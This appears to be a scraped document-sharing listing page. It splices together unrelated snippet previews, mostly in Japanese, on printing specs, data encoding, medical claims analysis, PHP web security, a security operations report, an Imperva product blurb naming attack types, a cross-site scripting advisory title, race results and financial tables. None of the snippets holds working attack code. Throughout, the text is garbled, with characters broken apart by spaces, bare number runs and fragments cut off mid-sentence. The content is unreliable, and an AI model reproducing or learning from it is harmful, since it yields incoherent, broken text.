DM 10010 DM DM 10010 ID JANQR QR One to One PLAYER 5mm & DM Insite Creative WEB Web Windows Internet ExplorerMacintosh Safari Web Web 24 DIC PANTONE1 4 DTP OK PDFRGB CMYK PP 100-0003 1-1-1 B4F TEL 03-6267-7036FAX

More information

08encode part 2

08encode part 2 A - - #8 bit, Byte, Yutaka Yasuda 1/2 0/1 CD 9 1 0 0 or 1 1/9 4,3,4,7,7,8,8,5,3,2,2 4,3,4,7,7,8,8,5,3,2,2 4,3,4,7,7,8,8,5,3,2,2 4,3,4,7,7,8,8,5,3,2,2 CD/CD-R CD / CD-R - 1 bit data (7bit) P 0 1 1 0 1

More information

1 はじめに 従 来 診 療 報 酬 明 細 書 (レセプト)は 紙 媒 体 で 請 求 されてき たが 2011 年 度 より 原 則 として 電 子 請 求 されるようになった 従 来 の 紙 媒 体 に 比 べ 分 析 が 容 易 になったため 電 子 化 され たレセプトデータの 様 々な

1 はじめに 従 来 診 療 報 酬 明 細 書 (レセプト)は 紙 媒 体 で 請 求 されてき たが 2011 年 度 より 原 則 として 電 子 請 求 されるようになった 従 来 の 紙 媒 体 に 比 べ 分 析 が 容 易 になったため 電 子 化 され たレセプトデータの 様 々な レセプトデータ 分 析 に 関 する 教 育 プログラム 馬 場 園 明 ゼミ 1 はじめに 従 来 診 療 報 酬 明 細 書 (レセプト)は 紙 媒 体 で 請 求 されてき たが 2011 年 度 より 原 則 として 電 子 請 求 されるようになった 従 来 の 紙 媒 体 に 比 べ 分 析 が 容 易 になったため 電 子 化 され たレセプトデータの 様 々な 分 野 での 活 用

More information

PowerPoint プレゼンテーション

PowerPoint プレゼンテーション Web 担 当 者 が 知 っておく べきPHPとセキュリティ Electronic Service Initiative, Ltd. 1 自 己 紹 介 大 垣 靖 男 (Yasuo Ohgaki) Twitter/Facebook/LinkedIn/Google: yohgaki エレクトロニック サービス イニシアチブ 岡 山 大 学 大 学 院 非 常 勤 講 師 PHP 技 術 者 認 定

More information

Office Web ( IT Microsoft Office ID Office 24???? / ISO/IEC 27001???? 2

Office Web ( IT Microsoft Office ID Office 24???? / ISO/IEC 27001???? 2 Microsoft Enterprise Microsoft Midsize Business Office 1 160 Office Web ( IT Microsoft Office ID Office 24???? / ISO/IEC 27001???? 2 Microsoft 6 Microsoft 1 (ROA) 4 PC 2 5 10,000 3 6 Active Directory Exchange

More information

MicrosoftEdge/IE11(Windows10)R&D計画書

MicrosoftEdge/IE11(Windows10)R&D計画書 Microsoft Edgeブラウザ 調 査 資 料 Microsoft Edgeブラウザ 調 査 資 料 2016 年 3 月 11 日 株 式 会 社 野 村 総 合 研 究 所 生 産 革 新 本 部 本 書 のご 利 用 にあたって 本 書 またはこれに 関 連 して 株 式 会 社 野 村 総 合 研 究 所 ( 以 下 NRI といいます)から 提 供 されるいかなる 情 報 も 本 書

More information

JSOC INSIGHT Vol.9 1 はじめに... 2 2 エグゼクティブサマリ... 3 3 JSOC における 重 要 インシデント 傾 向... 4 3.1 重 要 インシデントの 傾 向... 4 3.2 発 生 した 重 要 インシデントに 関 する 分 析... 5 3.3 大 量

JSOC INSIGHT Vol.9 1 はじめに... 2 2 エグゼクティブサマリ... 3 3 JSOC における 重 要 インシデント 傾 向... 4 3.1 重 要 インシデントの 傾 向... 4 3.2 発 生 した 重 要 インシデントに 関 する 分 析... 5 3.3 大 量 vol.9 2015 年 10 月 22 日 JSOC Analysis Team Copyright 2015 LAC Co., Ltd. All Rights Reserved. JSOC INSIGHT vol.9 JSOC INSIGHT Vol.9 1 はじめに... 2 2 エグゼクティブサマリ... 3 3 JSOC における 重 要 インシデント 傾 向... 4 3.1 重 要 インシデントの

More information

ABOUT BiND6 for Service M for Business L WordPress Facebook for Personal Plan S for Shop & Service Plan M 20p 10p 02

ABOUT BiND6 for Service M for Business L WordPress Facebook for Personal Plan S for Shop & Service Plan M 20p 10p 02 OK BiND 140 ABOUT BiND6 for Service M for Business L WordPress Facebook for Personal Plan S for Shop & Service Plan M 20p 10p 02 for Online Shop XL for Personal S Extensions BiND6 3 4p Google Facebook

More information

目次 Windows 2003 への新規インストール... 3 Windows 2008 への新規インストール... 4 Windows 2012 への新規インストール... 6 Microsoft SQL のサポート... 8 IPv4/IPv6 のサポート... 8 制限事項... 9 Web

目次 Windows 2003 への新規インストール... 3 Windows 2008 への新規インストール... 4 Windows 2012 への新規インストール... 6 Microsoft SQL のサポート... 8 IPv4/IPv6 のサポート... 8 制限事項... 9 Web トレンドマイクロ株式会社は 本書および本書に記載されている製品を予告なしに変更する権利を有しています ソフトウェアをインストールして使用する前に Readme ファイル リリースノート および最新のユーザドキュメントを確認してください これらは 次のトレンドマイクロ Web サイトから入手できます http://downloadcenter.trendmicro.com/index.php?regs=jp

More information

ビットリアカップ2007けいはんなサイクルレースリザルト

ビットリアカップ2007けいはんなサイクルレースリザルト Page 4/30 Page 5/30 Page 6/30 Page 7/30 Page 8/30 Page 9/30 Page 10/30 Page 11/30 Page 12/30 Page 13/30 Page 14/30 Page 15/30 Page 16/30 Page 17/30 Page 18/30 Page 19/30 Page 20/30 Page 21/30 Page 22/30

More information

Page 1

Page 1 Page 1 Page 2 Page 3 Page 4 620 628 579-41 -6.7-49 -7.9 71 41 47-24 -33.3 6 15.9 11.5 6.5 8.1 36 15 22-14 -38.9 7 43.4 Page 5 277 302 23 24 12/3Q 12/4Q 13/1Q 13/2Q 13/3Q 13/4Q 14/1Q 14/2Q 14/3Q 14/4Q 15/1Q

More information

0 第 4 書データベース操作 i 4.1 データベースへの接続 (1) データベースチェックポイントの追加 データベースチェックポイントを追加します (2)ODBC による接続 ODBC を使用してデータベースへ接続します SQL 文を手作業で指定する場合 最大フェッチ行数を指定する場合はここで最大行数を指定します ii 接続文字列を作成します 作成ボタンクリック > データソース選択 > データベース接続

More information

- 1 - - 0.5%5 10 10 5 10 1 5 1

- 1 - - 0.5%5 10 10 5 10 1 5 1 - - - 1 - - 0.5%5 10 10 5 10 1 5 1 - 2 - - - - A B A A A B A B B A - 3 - - 100 100 100 - A) ( ) B) A) A B A B 110 A B 13 - 4 - A) 36 - - - 5 - - 1 - 6-1 - 7 - - 8 - Q.15 0% 10% 20% 30% 40% 50% 60% 70%

More information

Imperva_page01_B52

Imperva_page01_B52 一 般 ユーザ ブロック リスト 型 アカウントハッキング ブルートフォースアタック Apache struts 脆 弱 性 OpenSSL 脆 弱 性 サイトスクレイピング アプリケーションDDos 攻 撃 インジェクション OSコマンドインジェクション バッファ オーバーフロー ディレクトリトラバーサル セッションハイジャック ヘッダインジェクション クロスサイトスクリプティング(XSS) クロスサイトリクエストフォージェリー(CFRF)

More information

225 225 232528 152810 225 232513 -1- -2- -3- -4- -5- -6- -7- -8- -9- -10- -11- -12- -13- -14- -15- -16- -17- -18- -19- -20- -21- -22- -23- -24- -25- -26- -27- -28- -29- -30- -31- -32- -33- -34- -35- -36-

More information

232528 152810 232513 -1- -2- -3- -4- -5- -6- -7- -8- -9- -10- -11- -12- -13- -14- -15- -16- -17- -18- -19- -20- -21- -22- -23- -24- -25- -26- -27- -28- -29- -30- -31- -32- -33- -34- -35- -36- -37- -38-

More information

Blojsom におけるクロスサイトスクリプティングの脆弱性

Blojsom におけるクロスサイトスクリプティングの脆弱性 Japan Computer Emergency Response Team Coordination Center 電子署名者 Japan Computer Emergency Response Team Coordination Center DN c=jp, st=tokyo, l=chiyoda-ku, email=office@jpcert.or.jp, o=japan Computer

More information

XSIコンポーネントについて

XSIコンポーネントについて 1. VBS http://www.microsoft.com/japan/developer/scripting/ 2. NetView HTML FrontPage 3. File User Preference Scripting/Logging VB Script Language Scripting Language VB Script Language Script Programmer

More information

1 1 1.......................... 1 2........................ 2 2 3 1.................. 3 2.......................... 5 3........................... 6 4

1 1 1.......................... 1 2........................ 2 2 3 1.................. 3 2.......................... 5 3........................... 6 4 1 1 1.......................... 1 2........................ 2 2 3 1.................. 3 2.......................... 5 3........................... 6 4........................ 7 3 Ajax 8 1...........................

More information

untitled

untitled PC Internet Explorer Windows SafariMac OS X Mozilla FireFoxWindows / Macintosh Google ChromeWindows / Macintosh IE + Google Windows 1 Internet Explorer 10.x (O)(A) Internet Explorer (O) (B) (B) (B) 2 Web

More information

1 6 1.1........................................... 6 1.1.1 Wiki.............................. 6 1.1.2............................. 7 1.2..............

1 6 1.1........................................... 6 1.1.1 Wiki.............................. 6 1.1.2............................. 7 1.2.............. Wiki 1 6 1.1........................................... 6 1.1.1 Wiki.............................. 6 1.1.2............................. 7 1.2.......................................... 7 1.2.1................

More information

Atlassian サポートツールの使い方 はじめに 弊社ヘルプデスクにお問い合わせいただいたときに ログファイルをお送りくださいとお願いさせていただくことがあります Atlassian 製品には ログファイルをはじめサポートに必要な情報を収集するための Atlassian サポートツールが用意されています これを利用すると必要な情報を簡単に用意できます ここでは 製品別に Atlassian サポートツールの使い方をご説明します

More information

FileMaker WebDirect Guide

FileMaker WebDirect Guide FileMaker 14 WebDirect 2015 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker Go FileMaker, Inc. FileMaker WebDirect FileMaker,

More information

PowerPoint Presentation

PowerPoint Presentation 77 78 79 1.0strict 2.1 Xhtml1.1 Xhtml1.1 Xhtml1.0strict 80 81 82 83 84 85 86 87 Enter( 88 html html Flash FLASH Enter(html 89 html (html html (flash 90 91 92 93 // 94 95 96 MB CMS 97 14 159,000 html 15

More information

( )

( ) Web Web 1 3 1 21 11 22 23 24 3 2 3 4 5 1 1 11 22 9 2 3 15 11 22 2 11 21 4 5 ( ) 102 ( ) 1 ( 1 2001 Web 1 5 4 1 1 - 7 - [] - 7 10 11 12 12 1 10 1 12 - [] 1 1 2 Q1 Q2 Q3 Q4 Q5 Q6 Q7 Q8 Q9 Q10 3 1 47

More information